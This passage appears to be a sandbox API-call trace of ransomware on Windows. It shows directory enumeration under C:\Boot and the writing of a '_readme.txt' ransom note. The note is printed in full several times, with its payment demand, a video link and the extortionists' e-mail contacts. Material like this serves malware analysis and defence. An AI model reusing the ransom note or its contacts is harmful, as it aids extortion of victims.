ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.862] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.862] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.862] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.862] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.862] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.866] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0093.866] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.867] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.867] PathFindFileNameW (pszPath="") returned="" [0093.867] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.868] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.868] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.868] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.868] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0093.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.868] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0093.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.869] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.869] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.869] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.870] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.870] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.871] CloseHandle (hObject=0x5c8) returned 1 [0093.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.871] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.872] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.872] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", 